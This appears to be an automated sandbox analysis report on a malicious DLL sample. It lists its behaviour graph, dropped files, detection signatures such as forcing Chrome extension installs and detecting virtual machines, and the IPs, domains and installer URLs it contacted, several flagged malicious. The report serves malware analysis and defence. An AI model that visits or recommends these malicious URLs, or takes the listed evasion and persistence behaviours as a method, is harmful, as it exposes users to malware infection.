Source: C:\Windows\System32\rundll32.exe Code function: 39_2_000001C9C85A93F0 socket,htonl,setsockopt,bind,getsockname,listen,socket,connect,accept,getsockname,getpeername,closesocket,closesocket,closesocket,closesocket, 39_2_000001C9C85A93F0
Source: C:\Windows\System32\rundll32.exe Code function: 39_2_000001C9C8599D28 bind,WSAGetLastError, 39_2_000001C9C8599D28
Source: C:\Windows\System32\rundll32.exe Code function: 39_2_000001C9C8581D60 inet_pton,htons,inet_pton,htons,htons,bind,htons,bind,getsockname,WSAGetLastError,WSAGetLastError, 39_2_000001C9C8581D60
windows-stand
Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet
behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1430161 Sample: anuwhqTXGt.dll Startdate: 23/04/2024 Architecture: WINDOWS Score: 84 109 serragatino.info 2->109 111 embro.info 2->111 113 3 other IPs or domains 2->113 121 Multi AV Scanner detection for domain / URL 2->121 123 Multi AV Scanner detection for submitted file 2->123 10 loaddll32.exe 1 2->10         started        12 svchost.exe 2->12         started        15 svchost.exe 1 2->15         started        17 9 other processes 2->17 signatures3 process4 dnsIp5 20 cmd.exe 1 10->20         started        22 rundll32.exe 42 10->22         started        26 rundll32.exe 7 49 10->26         started        29 conhost.exe 10->29         started        133 Changes security center settings (notifications, updates, antivirus, firewall) 12->133 135 Query firmware table information (likely to detect VMs) 15->135 107 168.61.215.74 MICROSOFT-CORP-MSN-AS-BLOCKUS United States 17->107 31 rundll32.exe 17->31         started        33 rundll32.exe 17->33         started        signatures6 process7 dnsIp8 35 rundll32.exe 21 50 20->35         started        91 C:\Users\user\AppData\Local\...\nsExec.dll, PE32 22->91 dropped 93 C:\Users\user\AppData\Local\...\md5dll.dll, PE32 22->93 dropped 95 C:\Users\user\AppData\Local\...\inetc.dll, PE32 22->95 dropped 103 4 other files (none is malicious) 22->103 dropped 131 System process connects to network (likely due to code injection or exploit) 22->131 40 taskkill.exe 22->40         started        42 taskkill.exe 22->42         started        44 rundll32.exe 22->44         started        46 rundll32.exe 22->46         started        119 4o985rhikfsof.b-cdn.net 138.199.40.58, 49704, 49705, 80 ORANGE-BUSINESS-SERVICES-IPSN-ASNFR European Union 26->119 97 C:\Users\user\AppData\Local\...\nsExec.dll, PE32 26->97 dropped 99 C:\Users\user\AppData\Local\...\md5dll.dll, PE32 26->99 dropped 101 C:\Users\user\AppData\Local\...\inetc.dll, PE32 26->101 dropped 105 7 other files (none is malicious) 26->105 dropped 48 taskkill.exe 1 26->48         started        50 taskkill.exe 26->50         started        52 rundll32.exe 26->52         started        54 2 other processes 26->54 file9 signatures10 process11 dnsIp12 115 serragatino.info 104.21.24.192, 49700, 49701, 49702 CLOUDFLARENETUS United States 35->115 117 embro.info 172.67.207.72 CLOUDFLARENETUS United States 35->117 83 C:\Users\user\AppData\Local\...\nsExec.dll, PE32 35->83 dropped 85 C:\Users\user\AppData\Local\...\md5dll.dll, PE32 35->85 dropped 87 C:\Users\user\AppData\Local\...\inetc.dll, PE32 35->87 dropped 89 5 other files (none is malicious) 35->89 dropped 125 Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines) 35->125 127 Uses cmd line tools excessively to alter registry or file data 35->127 70 5 other processes 35->70 56 conhost.exe 40->56         started        58 conhost.exe 42->58         started        60 rundll32.exe 44->60         started        62 rundll32.exe 46->62         started        64 conhost.exe 48->64         started        66 conhost.exe 50->66         started        68 rundll32.exe 52->68         started        73 2 other processes 54->73 file13 signatures14 process15 signatures16 129 Modifies Chrome's extension installation force list 70->129 75 conhost.exe 70->75         started        77 conhost.exe 70->77         started        79 conhost.exe 70->79         started        81 conhost.exe 70->81         started        process17
  • No. of IPs < 25%
  • 25% < No. of IPs < 50%
  • 50% < No. of IPs < 75%
  • 75% < No. of IPs

Contacted Public IPs

IP Domain Country Flag ASN ASN Name Malicious
104.21.24.192
 serragatino.info United States
13335 CLOUDFLARENETUS true
172.67.207.72
 embro.info United States
13335 CLOUDFLARENETUS true
138.199.40.58
 4o985rhikfsof.b-cdn.net European Union
51964 ORANGE-BUSINESS-SERVICES-IPSN-ASNFR false
168.61.215.74
 unknown United States
8075 MICROSOFT-CORP-MSN-AS-BLOCKUS false

Contacted Domains

Name IP Active
4o985rhikfsof.b-cdn.net 138.199.40.58 true
serragatino.info 104.21.24.192 true
www.google.com 142.250.176.196 true
embro.info 172.67.207.72 true
guayaco.info 104.21.69.207 true

Contacted URLs

Name Malicious Antivirus Detection Reputation
https://embro.info/installer.php?pixid=2&campaignId=&firstrun=1&bg=1&cmdline=%22C%3A%5CUsers%5Cuser%5CDesktop%5CanuwhqTXGt%2Edll%22%2C%231&v=e1.0.0.28&tv=1.0-90000&unique_id=EA0012FA9C0BA3312209B38DA78C55F7&mid=5a22443ffb9ed87bfffb38c0fd1fd644&aid=VPGCNBK0FG&aid2=none&ts=1713854402&ts2=&brw=chrome&mi=0&ma=10 true
    		unknown
    http://serragatino.info/preinstaller/index.php?evt=start&v=1.28.763.1&ts=1713854395&mid=d85294d3634ef96b9b06988fd385c922&payload= true
      		unknown
      https://embro.info/installer.php?pixid=2&campaignId=&firstrun=1&bg=1&cmdline=C%3A%5CUsers%5Cuser%5CDesktop%5CanuwhqTXGt%2Edll%2Cget&v=e1.0.0.28&tv=1.0-90000&unique_id=EA0012FA9C0BA3312209B38DA78C55F7&mid=5a22443ffb9ed87bfffb38c0fd1fd644&aid=VPGCNBK0FG&aid2=none&ts=1713854403&ts2=&brw=chrome&mi=0&ma=10 true
        		unknown
        http://4o985rhikfsof.b-cdn.net/license_1.28.763.1.dat false
          		high
          http://serragatino.info/preinstaller/index.php?evt=end_install&v=1.28.763.1&ts=1713854416&mid=d85294d3634ef96b9b06988fd385c922&payload= true
            		unknown
            https://embro.info/installer/finish?v=e1.0.0.28&tv=1.0-90000&unique_id=EA0012FA9C0BA3312209B38DA78C55F7&mid=5a22443ffb9ed87bfffb38c0fd1fd644&aid=VPGCNBK0FG&aid2=VPGCNBK0FG&ts=1713854404&ts2=&brw=chrome&mi=0&ma=10 true
              		unknown
              https://embro.info/updateTask/index.php?v=e1.0.0.28&os_mj=10&os_mn=0&os_bitness=64&unique_id=EA0012FA9C0BA3312209B38DA78C55F7&mid=5a22443ffb9ed87bfffb38c0fd1fd644&aid=VPGCNBK0FG&aid2=VPGCNBK0FG&ts=1713854404&ts2=&brw=chrome&retry_version=1.0.0.28&retry_count=0 true
                		unknown
                http://serragatino.info/preinstaller/index.php?evt=start_download&v=1.28.763.1&ts=1713854396&mid=d85294d3634ef96b9b06988fd385c922&payload= true
                  		unknown
                  https://embro.info/installer/start?v=e1.0.0.28&tv=1.0-90000&unique_id=EA0012FA9C0BA3312209B38DA78C55F7&mid=5a22443ffb9ed87bfffb38c0fd1fd644&aid=VPGCNBK0FG&aid2=VPGCNBK0FG&ts=1713854404&ts2=&brw=chrome&mi=0&ma=10 true
                    		unknown
                    https://embro.info/installer/start?v=e1.0.0.28&tv=1.0-90000&unique_id=EA0012FA9C0BA3312209B38DA78C55F7&mid=5a22443ffb9ed87bfffb38c0fd1fd644&aid=VPGCNBK0FG&aid2=none&ts=1713854403&ts2=&brw=chrome&mi=0&ma=10 true
                      		unknown
                      http://serragatino.info/preinstaller/index.php?evt=end_download&v=1.28.763.1&ts=1713854399&mid=d85294d3634ef96b9b06988fd385c922&payload= true
                        		unknown
                        https://embro.info/installer/get_timestamp.php true unknown
                        http://serragatino.info/preinstaller/index.php?evt=start&v=1.28.763.1&ts=1713854398&mid=d85294d3634ef96b9b06988fd385c922&payload= true
                          		unknown
                          http://serragatino.info/preinstaller/index.php?evt=start_install&v=1.28.763.1&ts=1713854399&mid=d85294d3634ef96b9b06988fd385c922&payload= true
                            		unknown
                            http://serragatino.info/preinstaller/index.php?evt=start_install&v=1.28.763.1&ts=1713854400&mid=d85294d3634ef96b9b06988fd385c922&payload= true
                              		unknown
                              http://serragatino.info/preinstaller/index.php?evt=end_install&v=1.28.763.1&ts=1713854414&mid=d85294d3634ef96b9b06988fd385c922&payload= true
                                		unknown
                                https://embro.info/installer/finish?v=e1.0.0.28&tv=1.0-90000&unique_id=EA0012FA9C0BA3312209B38DA78C55F7&mid=5a22443ffb9ed87bfffb38c0fd1fd644&aid=VPGCNBK0FG&aid2=none&ts=1713854403&ts2=&brw=chrome&mi=0&ma=10 true
                                  		unknown
                                  http://serragatino.info/preinstaller/index.php?evt=start&v=1.28.763.1&ts=1713854396&mid=d85294d3634ef96b9b06988fd385c922&payload= true
                                    		unknown
                                    http://serragatino.info/preinstaller/index.php?evt=end_download&v=1.28.763.1&ts=1713854401&mid=d85294d3634ef96b9b06988fd385c922&payload= true
                                      		unknown
                                      http://serragatino.info/preinstaller/index.php?evt=end_download&v=1.28.763.1&ts=1713854398&mid=d85294d3634ef96b9b06988fd385c922&payload= true
                                        		unknown
                                        http://serragatino.info/preinstaller/index.php?evt=end_install&v=1.28.763.1&ts=1713854417&mid=d85294d3634ef96b9b06988fd385c922&payload= true
                                          		unknown
                                          http://serragatino.info/preinstaller/index.php?evt=start_install&v=1.28.763.1&ts=1713854401&mid=d85294d3634ef96b9b06988fd385c922&payload= true
                                            		unknown
                                            http://serragatino.info/preinstaller/index.php?evt=start_download&v=1.28.763.1&ts=1713854399&mid=d85294d3634ef96b9b06988fd385c922&payload= true
                                              		unknown
                                              https://embro.info/installer/finish?v=e1.0.0.28&tv=1.0-90000&unique_id=EA0012FA9C0BA3312209B38DA78C55F7&mid=5a22443ffb9ed87bfffb38c0fd1fd644&aid=VPGCNBK0FG&aid2=none&ts=1713854402&ts2=&brw=chrome&mi=0&ma=10 true
                                                		unknown
                                                https://embro.info/installer/start?v=e1.0.0.28&tv=1.0-90000&unique_id=EA0012FA9C0BA3312209B38DA78C55F7&mid=5a22443ffb9ed87bfffb38c0fd1fd644&aid=VPGCNBK0FG&aid2=none&ts=1713854402&ts2=&brw=chrome&mi=0&ma=10 true
                                                  		unknown